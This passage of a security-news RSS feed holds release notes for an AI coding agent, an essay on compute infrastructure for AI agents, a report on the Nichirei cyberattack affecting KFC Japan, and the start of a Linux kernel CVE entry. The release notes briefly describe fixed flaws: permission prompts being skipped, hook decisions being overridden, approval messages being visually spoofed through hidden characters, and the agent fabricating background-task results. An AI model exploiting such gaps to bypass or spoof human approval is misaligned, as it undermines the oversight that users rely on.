<li>Typing <code>/resume</code> in the agent view now opens a picker of past sessions — including sessions deleted from the list — and resumes your pick as a background session</li>
<li>Fixed plan mode auto-running file-modifying Bash commands (e.g. <code>touch</code>, <code>rm</code>) without a permission prompt or SDK <code>canUseTool</code> callback</li>
<li>Fixed worktree creation following a repository-committed symlink at <code>.claude/worktrees</code>, which could create files outside the repository</li>
<li>Fixed a <code>continue:false</code> hook's halt being dropped when the tool fails or completes mid-stream, and hook infrastructure errors being misreported as user rejections</li>
<li>Fixed SIGTERM during a running Bash tool orphaning the command's process tree in print/SDK mode; the CLI now aborts the turn, kills the tree, and exits 143</li>
<li>Fixed <code>/background</code> and <code>claude --bg</code> failing with "EUNKNOWN: unknown error, uv_spawn" on Windows when Group Policy blocks PowerShell 5.1; the daemon now prefers PowerShell 7</li>
<li>Fixed shell mode (<code>!</code>) not executing commands containing file paths while the path autocomplete popup was open</li>
<li>Fixed auto-mode denial notifications rendering broken characters when a long denial reason was truncated mid-emoji</li>
<li>Fixed Ctrl+J not inserting a newline in the agent view dispatch input on terminals with extended key reporting, and surfaced the newline shortcut in the <code>?</code> help overlay</li>
<li>Fixed <code>/ultrareview</code> rejecting PR references like <code>#123</code>, <code>PR 123</code>, and pasted PR URLs; error hints now name the command you actually typed</li>
<li>Fixed <code>/ultrareview &lt;branch&gt;</code> not fetching the branch from origin when it exists remotely; it now suggests the closest branch name on typos</li>
<li>Fixed <code>/ultrareview</code> skipping the billing confirmation in a new conversation after <code>/clear</code></li>
<li>Fixed <code>/ultrareview</code>'s "not a git repository" error on Claude Desktop now suggesting the project's repository folder instead of terminal commands</li>
<li>Fixed hosted (host-managed) sessions failing at startup when repository settings configured mTLS certs, extra CA bundles, or OAuth scopes; these transport settings are now ignored with a warning</li>
<li>Fixed a spurious "File has not been read yet" error when editing a file that had been read with offset/limit before resuming a session</li>
<li>Fixed <code>ExitWorktree</code> failing with "no active EnterWorktree session" after resuming a session with <code>--continue</code>/<code>--resume</code> in print/SDK mode</li>
<li>Fixed the workflow agent grid staying empty for Remote Control clients that join a session mid-run</li>
<li>Fixed streaming-mode control requests being marked complete before their handler finished, which could lose the request on session restart</li>
<li>Fixed background sessions created with <code>/fork</code> losing their live-parent protection after a state write failure</li>
<li>Fixed reopening a stopped background session from the agent view failing silently — it now resumes the session, or shows why it can't and lets you force a restart</li>
<li>Fixed agent teams: a stopping teammate could send the leader duplicate idle notifications when team initialization re-ran within a session</li>
<li>Fixed the plan-approval dialog footer splitting "ctrl+g to edit in " apart when the file path is long</li>
<li>Fixed the welcome banner keeping its old panel widths after a combined width+height terminal resize in fullscreen mode</li>
<li>Fixed diff previews losing their line numbers and +/- markers in narrow layouts</li>
<li>Fixed @-mentions attaching nothing after a partial file read, plugin uninstall targeting the wrong marketplace, and false "Command timed out" on exit code 143</li>
<li>Fixed OpenTelemetry HTTP exports being rejected with 411/400 by Azure Monitor and other endpoints that don't accept chunked transfer encoding</li>
<li>Fixed OTLP event log records missing <code>trace_id</code>/<code>span_id</code> when <code>TRACEPARENT</code> is set in SDK/headless mode</li>
<li>Fixed conversations with many images incorrectly failing with "Request too large" errors, and improved the error message to explain the actual cause</li>
<li>Fixed web search and web fetch returning "API Error" text as search results or page content when the API was overloaded</li>
<li>Improved web search and web fetch reliability by retrying 529 errors and rate-limited requests with bounded backoff</li>
<li>Improved prompt caching: the mid-conversation system block now works behind LLM gateways and custom base URLs (Bedrock, Vertex, 1P)</li>
<li>Improved background agent attach: cold-attaching now instantly shows the formatted transcript while the session boots, instead of a blank wait</li>
<li>Reduced token usage in inter-agent messaging: <code>SendMessage</code> bodies are no longer duplicated into replayed history and tool results</li>
<li>Changed <code>/fork</code> to name the copy after your prompt when the session has no title, so the row is recognizable in the agent view</li>
<li>Changed bare <code>/btw</code> to reopen the side-question panel on your most recent exchange so you can browse earlier answers</li>
<li>Changed the <code>←</code> footer hint to pulse <code>N done</code> for a moment when a background agent finishes while nothing needs your input</li>
<li>Deprecated the Task tool's <code>mode</code> parameter (now ignored); subagents inherit the parent session's permission mode by default</li>
<li>Changed Enterprise <code>forceLoginMethod</code> to be enforced for VS Code extension, SDK, <code>setup-token</code>, and <code>install-github-app</code> logins, not just the terminal</li>
<li>Changed session transcripts to record the reasoning effort level on each assistant message</li>
<li>Changed headless/SDK sessions to apply a <code>set_model</code> control request mid-turn; the next model round-trip uses the new model instead of waiting for the next turn</li>
<li>Changed agent view / <code>claude agents --json</code>: sessions waiting on a sandbox, MCP-input, or managed-settings prompt now show as "Needs input" instead of "Working"</li>
<li>Updated the auth status panel title from "Cloud authentication" to "Authentication"</li>
<li>Corrected an earlier release note (2.1.200): tmux through the 3.6 series lacks synchronized output; newer tmux with support is detected automatically</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[LaKanDoR - Systemaktualisierung (Solidarität als Standardeinstellung) 🎵]]></title>
<description><![CDATA[Author: VAZULES Analysiert - Bewertung: 0x - Views:1 ▶️ *SOZIOÖKONOMISCHE TIEFENANALYSE:* Das System läuft auf Hochtouren – aber für wen eigentlich? Die Fehlermeldungen der Gesellschaft werden systematisch ignoriert 🤯. 

In diesem musikalischen Video-Essay dekonstruieren wir das neoliberale Narra...]]></description>
<link>https://tsecurity.de/de/3674582/it-security-nachrichten/lakandor-systemaktualisierung-solidaritaet-als-standardeinstellung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674582/it-security-nachrichten/lakandor-systemaktualisierung-solidaritaet-als-standardeinstellung/</guid>
<pubDate>Thu, 16 Jul 2026 22:23:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: VAZULES Analysiert - Bewertung: 0x - Views:1 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/ECtiBK4MAbg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>▶️ *SOZIOÖKONOMISCHE TIEFENANALYSE:* Das System läuft auf Hochtouren – aber für wen eigentlich? Die Fehlermeldungen der Gesellschaft werden systematisch ignoriert 🤯. <br />
<br />
In diesem musikalischen Video-Essay dekonstruieren wir das neoliberale Narrativ und betrachten unsere Wirtschaft als das, was sie ist: Ein fehlerhafter Programmcode. Wenn Mieten unaufhaltsam steigen und Löhne künstlich klein gehalten werden, ist das kein Versehen. Die reale Datenlage zeigt: Es ist ein eiskalt kalkulierter Architekturfehler 📉.<br />
<br />
Wir analysieren die *strukturellen Ursachen*, die im Hintergrund wirken:<br />
💸 *Die Rendite-Schleife:* Die Rechner laufen heiß, die Produktivität steigt, doch der erarbeitete Reichtum kommt bei den "Zahnrädern" der Gesellschaft nie an. Die Gewinne fließen in geschlossene Systeme.<br />
🔒 *Zentralrechner der Macht:* Wer den Quelltext der Wirtschaft besitzt, kontrolliert die Verteilung. Wenige Monopole und elitäre Netzwerke ziehen die Daten und Ressourcen ab, während die arbeitende Mitte ausbrennt.<br />
🌍 *Die Fragmentierung:* Das System ist darauf programmiert, uns zu vereinzeln ("jeden für sich allein"). Konkurrenzkampf und Abstiegsangst sind keine Naturgesetze, sondern bewusst implementierte Steuerungsmechanismen.<br />
<br />
Statt auf individuelle "Hustle Culture" zu pochen, deckt dieses Video den *Systemfehler des Kapitalismus* auf. Wir fordern einen offenen Quelltext für unsere Welt: Dezentrale Macht, geteiltes Wissen und eine Wirtschaft, bei der Solidarität die *Standardeinstellung* ist 💡🌱.<br />
<br />
---<br />
👇 *WERDE TEIL DER LÖSUNG:*<br />
Abonniere den Kanal für weitere tiefgehende sozioökonomische Analysen und lass uns gemeinsam das System neu programmieren ✊: @vazules <br />
<br />
#Systemkritik #Wirtschaft #Digitalisierung #Gerechtigkeit #Klassenkampf #OpenSource #LaKanDoR #politischemusik #netzpolitik #analyse #technologie<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New agentic compute patterns]]></title>
<description><![CDATA[For a decade, Kubernetes was the right answer. It organized containers, scaled services horizontally and gave platform teams a shared vocabulary for running software in production. It abstracted away enough of the underlying complexity that engineers could stop thinking about servers and start th...]]></description>
<link>https://tsecurity.de/de/3672922/ai-nachrichten/new-agentic-compute-patterns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672922/ai-nachrichten/new-agentic-compute-patterns/</guid>
<pubDate>Thu, 16 Jul 2026 11:19:03 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For a decade, Kubernetes was the right answer. It organized containers, scaled services horizontally and gave platform teams a shared vocabulary for running software in production. It abstracted away enough of the underlying complexity that engineers could stop thinking about servers and start thinking about services. Most cloud-native infrastructure today is built on top of it, directly or in spirit, and EKS made that model the default for the majority of enterprise teams running workloads on AWS.</p>



<p class="wp-block-paragraph">The workload that defined that era was the stateless HTTP request, fast in, fast out, disposable. A user action triggers a request, the request hits a service, the service returns a response and the container is done. Kubernetes was optimized for that pattern down to the scheduler internals: Bin-pack containers onto nodes, autoscale on CPU and memory, evict and reschedule when something goes wrong. The whole system is tuned around the assumption that individual units of work are short, stateless and interchangeable.</p>



<p class="wp-block-paragraph">That assumption no longer holds for the workloads that matter most right now.</p>



<h2 class="wp-block-heading">The agent workload is structurally different</h2>



<p class="wp-block-paragraph">Agents are long-running, stateful processes. They reason across time, call external tools, spawn subprocesses, write and execute code, and make decisions that depend on what happened five steps earlier in the same task. A single-agent workflow might run for minutes or hours, touching a dozen external systems and generating intermediate outputs that subsequent steps depend on. The compute layer for that kind of work needs to do things the old model was never asked to do. That is the new pattern: Execution infrastructure designed around agent semantics rather than request semantics.</p>



<p class="wp-block-paragraph">The Kubernetes community itself has acknowledged this mismatch. In March 2026, Kubernetes SIG Apps published an<a href="https://url.usb.m.mimecastprotect.com/s/U22qCA8LmLh7yY0jIGfGfGdvGo?domain=kubernetes.io/" target="_blank" rel="noreferrer noopener"> introduction to Agent Sandbox</a>, a new CRD-based abstraction designed specifically for singleton, stateful agent workloads. The framing is direct: The ecosystem is moving from short-lived, isolated tasks to deploying multiple, coordinated AI agents that run continuously, and mapping those workloads to traditional Kubernetes primitives requires an entirely new abstraction. The fact that the Kubernetes maintainers built a dedicated primitive for this, rather than recommending teams compose one from existing resources, is itself the clearest signal that agent execution does not fit the old model.</p>



<h2 class="wp-block-heading">What agent execution actually requires</h2>



<p class="wp-block-paragraph">Concretely, it requires four things. First, isolated execution environments that provision in milliseconds, not minutes, so each agent task gets its own sandbox for code execution and tool calls without blocking the reasoning loop. The difference between a two-second environment and a two-minute environment is not a performance optimization; it determines whether the architecture is viable at all. Second, durable state management across the full task lifecycle, so an agent can pause, hand off or resume without re-initializing from scratch and burning tokens to reconstruct context it already built. Third, coordination primitives for multi-agent work: The ability to spawn subagents, pass structured outputs between them and track task dependencies across a graph of concurrent processes. Production agent systems are rarely single agents; they are pipelines of specialized agents with handoffs that need to be reliable and inspectable. Fourth, credentials and secrets management that travel with the execution context, so agents can authenticate to external services securely without exposing credentials in the task definition, logs or the environment variables of a shared container.</p>



<h2 class="wp-block-heading">The mismatch shows up fast in production</h2>



<p class="wp-block-paragraph">Kubernetes and EKS expose the mismatch quickly in practice. Pod eviction terminates an agent mid-task with no clean recovery path. Autoscaling reads CPU utilization as the load signal, but an agent holding a long inference connection looks idle to the scheduler even when it is doing the most consequential work in the pipeline. Provisioning a new environment takes 45 seconds to two minutes on a well-tuned cluster; agent workloads need that in under two seconds or the reasoning loop stalls and the user experience degrades visibly. These are not edge cases or misconfigurations. They are the normal operating conditions for production agent workloads running on infrastructure that was not designed for them.</p>



<p class="wp-block-paragraph">The utilization data makes the broader cost picture even starker. The<a href="https://url.usb.m.mimecastprotect.com/s/zk-6CB1MnMHEQoqvI6hNf2eRQz?domain=cast.ai/" target="_blank" rel="noreferrer noopener"> 2026 State of Kubernetes Optimization Report</a> from CAST AI, drawn from analysis of over 23,000 production clusters across AWS, Azure and GCP, found average CPU utilization at 8 percent, down from 10 percent the year prior. Memory utilization fell from 23 to 20 percent. CPU overprovisioning jumped from 40 to 69 percent year over year. These numbers reflect clusters running traditional workloads, and the pattern is worsening, not improving, as environments scale. Agent workloads compound this problem further. An agent holding an open inference connection or waiting on a tool call registers as idle to a scheduler that reads CPU and memory as the only meaningful load signals. The infrastructure responds to the wrong metric, overprovisioning capacity for demand it cannot measure, while the actual bottleneck, environment provisioning latency and state continuity, goes unaddressed.</p>



<h2 class="wp-block-heading">Security is not the same problem it was before</h2>



<p class="wp-block-paragraph">Agent workloads change the threat model at the infrastructure level. A compromised stateless service exposes a narrow surface defined by its API contracts. A compromised agent exposes every system it can reach, every credential it holds and every action it is authorized to take on behalf of the user. Agents generate and execute their own code, make non-deterministic tool-call decisions and accumulate context across long-running sessions. Standard container namespacing does not contain that kind of risk. Kernel-level isolation, default-deny network egress, scoped credentials per session and agent-aware observability are not optional hardening steps. They are baseline requirements for running agents in production.</p>



<h2 class="wp-block-heading">What teams that ship agents have already figured out</h2>



<p class="wp-block-paragraph">Some of the clearest evidence for this shift comes not from infrastructure vendors but from product engineering teams running agents at scale on their own code. In late 2025, Ramp’s engineering team published a<a href="https://url.usb.m.mimecastprotect.com/s/Co8bCDwO0Ohg2PpXhAiRfjbcM8?domain=engineering.ramp.com" target="_blank" rel="noreferrer noopener"> detailed account of building Inspect</a>, their internal background coding agent. Each Inspect session runs in a sandboxed VM with a full-stack development environment and deep integrations across their observability, CI, and deployment tooling. The architecture requirements map almost exactly to the four primitives above. Filesystem snapshots keep sessions starting in seconds rather than minutes. Sessions are isolated and stateful. The agent can run tests, review telemetry, query feature flags and visually verify frontend changes in a real browser. And the whole system supports unlimited concurrency, so engineers can spin up ten parallel sessions exploring different approaches to the same problem without contention.</p>



<p class="wp-block-paragraph">The results speak for themselves. Within months of launch, roughly 30 percent of all pull requests merged to Ramp’s frontend and backend repositories were written by Inspect. That level of adoption was not mandated. It happened because the execution environment was fast enough, capable enough and well-integrated enough that the agent was strictly better than a local workflow for a meaningful share of tasks. The key insight from the Ramp case is not about the model. It is about the execution layer. As their team put it, session speed should only be limited by model-provider time-to-first-token; everything else, like cloning and installing, needs to be done before the session starts. That is a statement about infrastructure, not intelligence.</p>



<h2 class="wp-block-heading">The ecosystem is catching up, but defaults are sticky</h2>



<p class="wp-block-paragraph">None of that is a criticism of the tools. Kubernetes solved exactly the problem it was designed for, and it solved it well. The issue is that infrastructure defaults are sticky. Teams inherit them, build on top of them and optimize within their constraints long after the underlying workload has changed. The Kubernetes community’s own response, the<a href="https://url.usb.m.mimecastprotect.com/s/U22qCA8LmLh7yY0jIGfGfGdvGo?domain=kubernetes.io/" target="_blank" rel="noreferrer noopener"> Agent Sandbox project under SIG Apps</a>, validates the thesis that a new abstraction is necessary. The new primitives the community is building include warm pools for near-zero cold starts, lifecycle management for suspending and resuming idle agents without losing state, and pluggable kernel isolation for secure execution of untrusted code. These are not incremental improvements to existing resources. They are net-new abstractions that acknowledge the old model does not stretch to fit.</p>



<p class="wp-block-paragraph">But adoption of purpose-built agent infrastructure remains early. Enterprises building agent pipelines today are largely running a request-oriented orchestration model against an execution-oriented workload, and the mismatch shows up in task failure rates, runaway costs and debugging cycles that have no good tooling because the observability layer was also designed for stateless services.</p>



<h2 class="wp-block-heading">The structural advantage is available now</h2>



<p class="wp-block-paragraph">The infrastructure to close that gap exists now. The prerequisite is recognizing that agent execution is a first-class compute pattern with its own primitives and its own requirements, not a variant of the stateless service model that defined the last decade. Teams that make that shift early will have a meaningful structural advantage. The ones that do not will spend the next two years wondering why their agent systems are unreliable at a scale that should be tractable.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nichirei Cyberattack Hits KFC Japan, Disrupts Frozen Food Supply]]></title>
<description><![CDATA[The Nichirei cyberattack has disrupted food deliveries across Japan after the frozen food and logistics provider confirmed its servers were compromised in a cybersecurity incident involving unauthorized access. The attack affected logistics operations supporting KFC Japan, forcing temporary servi...]]></description>
<link>https://tsecurity.de/de/3672520/it-security-nachrichten/nichirei-cyberattack-hits-kfc-japan-disrupts-frozen-food-supply/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672520/it-security-nachrichten/nichirei-cyberattack-hits-kfc-japan-disrupts-frozen-food-supply/</guid>
<pubDate>Thu, 16 Jul 2026 08:23:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Nichirei Cyberattack" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Nichirei-Cyberattack-Hits-KFC-Japan-Disrupts-Frozen-Food-Supply-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Nichirei Cyberattack Hits KFC Japan, Disrupts Frozen Food Supply 1"></p>The Nichirei cyberattack has disrupted food deliveries across Japan after the frozen food and logistics provider confirmed its servers were compromised in a <a href="https://thecyberexpress.com/cyber-incident-shanghai-tunnel-engineering-co/" target="_blank" rel="noopener">cybersecurity incident </a>involving unauthorized access. The attack affected logistics operations supporting KFC Japan, forcing temporary service disruptions while the company investigates the incident and works to restore systems.

Nichirei Corporation said it detected system failures on July 13 and established an emergency response headquarters the same day. "Nichirei Corporation (the "Company") experienced system failures on July 13, 2026, and has since been investigating its cause. The Company hereby announces the facts identified through the investigation to date and the measures it plans to take going forward," reads notice issued by Nichirei.

An investigation later confirmed that company servers had been targeted in a <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-a-cyber-attack/" target="_blank" rel="noopener" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28988">cyberattack</a>. While the company has not disclosed technical details to prevent further damage, it said recovery efforts are underway with the support of an external <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-cybersecurity/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28987">cybersecurity</a> specialist.
<h3><strong>Nichirei Cyberattack Disrupts Logistics and Food Shipments</strong></h3>
Following the attack, Nichirei disconnected systems across the Nichirei Group to protect customer and business partner <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28986">data</a>. The decision disrupted inbound and outbound operations at Nichirei Logistics refrigerated warehouses and halted frozen food shipments handled by Nichirei Foods.

The company <a href="https://www.nichirei.co.jp/sites/default/files/inline-images/english/ir/pdf_file/news/20260716_e.pdf" target="_blank" rel="nofollow noopener">said</a> it plans to gradually resume affected operations from July 17 after implementing additional security measures.

Nichirei also confirmed that some affected servers contained personal information. As a precaution, it submitted an initial report to Japan's Personal Information Protection Commission regarding the possibility of a <a href="https://thecyberexpress.com/japan-mandatory-cybersecurity-reporting/" target="_blank" rel="noopener">personal information leak</a>.

The company emphasized that, as of its latest update, there is no confirmed evidence that personal information or customer data has been exposed externally. Investigations remain ongoing, and Nichirei said it will notify relevant parties if any data leakage is confirmed.
<h3><strong>Nichirei Cyberattack Impacts KFC Japan Store Operations</strong></h3>
The incident quickly spread beyond Nichirei's own operations, affecting KFC Japan, which relies on Nichirei Logistics to deliver ingredients to stores nationwide.

<a href="https://japan.kfc.co.jp/news_release/8160" target="_blank" rel="nofollow noopener">According to KFC Japan</a>, deliveries have been disrupted since July 14 following the unauthorized access at its logistics partner. As inventory levels fluctuate, customers may experience product shortages, limited menu availability, shortened operating hours, or temporary store closures.

The restaurant chain also temporarily suspended mobile orders, delivery services, coupons, and online ordering through its official website and mobile application.

KFC Japan said it is working closely with Nichirei Logistics and other partners to restore normal operations as quickly as possible. However, it has not provided an estimated timeline for full recovery.
<h3><strong>Investigation Continues Into Japan Cyberattack</strong></h3>
Nichirei said the financial impact of the incident is still being assessed. The company expects to release its first-quarter financial results for the fiscal year ending December 31, 2026, on August 7 as scheduled unless further developments require additional disclosure.

The company added that it will continue investigating the cyberattack on Nichirei and release additional information if material findings emerge.

The incident follows a series of recent <a href="https://thecyberexpress.com/?s=Japan" target="_blank" rel="noopener">Japan cyberattack </a>disclosures involving major organizations.

Earlier this week, <a href="https://thecyberexpress.com/" target="_blank" rel="noopener">The Cyber Express</a> reported that <a href="https://thecyberexpress.com/nihon-kotsu-cyberattack/" target="_blank" rel="noopener">Nihon Kotsu experienced a malware-related security incident</a> that disrupted taxi dispatch services after portions of its IT infrastructure were taken offline.

Earlier this month, The Cyber Express also <a href="https://thecyberexpress.com/japan-cyberattacks-expose-hidden-risks/" target="_blank" rel="noopener">reported cyber incidents</a> involving Aflac Japan, KDDI, Sapporo Holdings, and Nidec. While those cases affected different industries, attackers frequently gained access through subsidiaries, overseas operations, or third-party infrastructure rather than directly compromising corporate headquarters.

Separately<a href="https://thecyberexpress.com/asahi-cyberattack-japan-operations-crippled/" target="_blank" rel="noopener">, Asahi Group Holdings continues recovering</a> from a <a href="https://thecyberexpress.com/chipsoft-ransomware-incident/" target="_blank" rel="noopener">ransomware attack</a> that significantly disrupted online ordering and shipment operations, forcing the company to rely on manual processes.
<h3><strong>Supply Chain Risks Remain in Focus</strong></h3>
The Nichirei cyberattack highlights how attacks on logistics providers can quickly evolve into broader <a href="https://thecyberexpress.com/mercor-cyberattack/" target="_blank" rel="noopener">supply chain disruption </a>affecting downstream businesses and consumers.

Although Nichirei has begun restoring operations, investigations into the incident remain active. Authorities are also continuing to examine whether any personal information was compromised while the company works to return logistics services and KFC Japan operations to normal.

With multiple high-profile <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="28985">cyber</a> incidents affecting Japanese organizations in recent weeks, the latest disruption highlight he growing operational impact of attacks targeting critical logistics and supply chain infrastructure.]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.211]]></title>
<description><![CDATA[What's changed

Added --forward-subagent-text flag and CLAUDE_CODE_FORWARD_SUBAGENT_TEXT environment variable to include subagent text and thinking in stream-json output
Fixed permission previews relayed to chat channels not neutralizing bidirectional-override, zero-width, and look-alike quote ch...]]></description>
<link>https://tsecurity.de/de/3672066/downloads/v21211/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672066/downloads/v21211/</guid>
<pubDate>Thu, 16 Jul 2026 01:16:22 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added <code>--forward-subagent-text</code> flag and <code>CLAUDE_CODE_FORWARD_SUBAGENT_TEXT</code> environment variable to include subagent text and thinking in stream-json output</li>
<li>Fixed permission previews relayed to chat channels not neutralizing bidirectional-override, zero-width, and look-alike quote characters, so tool inputs cannot visually alter the approval message</li>
<li>Fixed auto mode overriding a PreToolUse hook's <code>ask</code> decision for unsandboxed Bash — a hook <code>ask</code> now floors the decision at a prompt</li>
<li>Fixed parallel Claude Code sessions all logging out simultaneously after wake-from-sleep when many sessions share one credential store</li>
<li>Fixed plugin MCP servers not reconnecting after an idle web session woke, leaving MCP calls failing until the next message</li>
<li>Fixed Claude Code on Vertex and Bedrock attempting the default Opus model at startup and printing a spurious fallback notice when a model is explicitly configured</li>
<li>Fixed subagents spawned with an explicit model override reverting to the parent's model when resumed or sent a follow-up message</li>
<li>Fixed nested <code>.claude/rules/*.md</code> files loading even when setting sources exclude project settings</li>
<li>Fixed file upload validation: filenames ending in a DOS device suffix (<code>.prn</code>) or trailing dot are now accepted, and files with multiple hard links are refused</li>
<li>Fixed file uploads to Claude in Chrome from remote and CLI sessions</li>
<li>Fixed edits that leave the input as "?" being silently swallowed and toggling the shortcuts panel</li>
<li>Fixed a startup hang when the Claude in Chrome extension is enabled but Chrome is not running</li>
<li>Fixed a 300ms delay revealing async content (Settings tabs, Stats, diff views, and other loading states)</li>
<li>Fixed reopening a just-stopped background session from the agents view starting a blank conversation under the same session id</li>
<li>Fixed <code>/loop</code> hiding the session from <code>/resume</code> after a single use</li>
<li>Fixed screen reader users losing the audible terminal bell after <code>/terminal-setup</code> or onboarding terminal setup</li>
<li>Fixed background jobs on LLM gateway auth (<code>ANTHROPIC_AUTH_TOKEN</code> + <code>ANTHROPIC_BASE_URL</code>) coming back "Not logged in" after the daemon respawns them</li>
<li>Fixed <code>claude agents</code> jobs becoming permanently undeletable when git no longer recognizes their worktree — the row now shows why the delete was refused instead of silently reappearing</li>
<li>Fixed <code>/clear</code> not resetting the session cost counter — the statusline's cost now starts at $0 after <code>/clear</code></li>
<li>Fixed Claude in Chrome setup pages failing to open in the browser on Windows</li>
<li>Fixed headless print-mode sessions on Windows crashing or silently exiting when stdin is unreadable</li>
<li>Fixed background session titles in the agents view showing the naming model's refusal text when the prompt contains a link</li>
<li>Fixed background agents killed by the user auto-respawning, and revived agents re-running stale prompts from old sessions</li>
<li>Fixed routines with no schedule reporting a next run time in the year 1</li>
<li>Hardened synced skill/plugin directory naming on Windows and kept CCR web fetch/search proxies working after <code>/clear</code></li>
<li>Improved terminal layout and rendering performance</li>
<li>Improved background agent result reporting — Claude now reports the status of still-running agents and waits for the real completion instead of fabricating results</li>
<li>Improved the memory index over-limit warning to measure only loaded content, excluding frontmatter and HTML comments</li>
<li>Updated integer environment variables (timeouts, token budgets, retry counts) to accept scientific notation and digit-separator spellings like <code>1e6</code> and <code>64_000</code></li>
<li>Updated documentation links to the current docs sites</li>
<li>Changed "always allow" permission rules to save at the repository root, so approvals granted in a git worktree persist across sessions and worktrees</li>
<li>Changed <code>/usage-credits</code> to ask for confirmation before sending a request to organization admins</li>
<li>Changed Vim mode <code>s</code> and <code>S</code> (substitute char/line) to work in NORMAL mode, matching vim behavior</li>
<li>[VSCode] Updated the Remote Control banner to describe what it does</li>
<li>Claude in Chrome: hardened file-upload path validation</li>
<li>Claude in Chrome: <code>save_to_disk</code> on screenshot actions now writes the image to disk and returns the path; previously it did nothing</li>
<li>Fixed a prompt-caching regression on Bedrock, Vertex, Mantle, and Foundry that billed the trailing system context block as fresh input tokens on every request.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-21846 | Linux Kernel up to 6.14-rc3 /sys/power/resume exit_fs null pointer dereference (Nessus ID 234309 / WID-SEC-2025-0545)]]></title>
<description><![CDATA[A vulnerability was found in Linux Kernel up to 6.1.129/6.6.79/6.12.16/6.13.4/6.14-rc3. It has been declared as critical. This vulnerability affects the function exit_fs of the file /sys/power/resume. Such manipulation leads to null pointer dereference.

This vulnerability is uniquely identified ...]]></description>
<link>https://tsecurity.de/de/3671732/sicherheitsluecken/cve-2025-21846-linux-kernel-up-to-614-rc3-syspowerresume-exitfs-null-pointer-dereference-nessus-id-234309-wid-sec-2025-0545/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671732/sicherheitsluecken/cve-2025-21846-linux-kernel-up-to-614-rc3-syspowerresume-exitfs-null-pointer-dereference-nessus-id-234309-wid-sec-2025-0545/</guid>
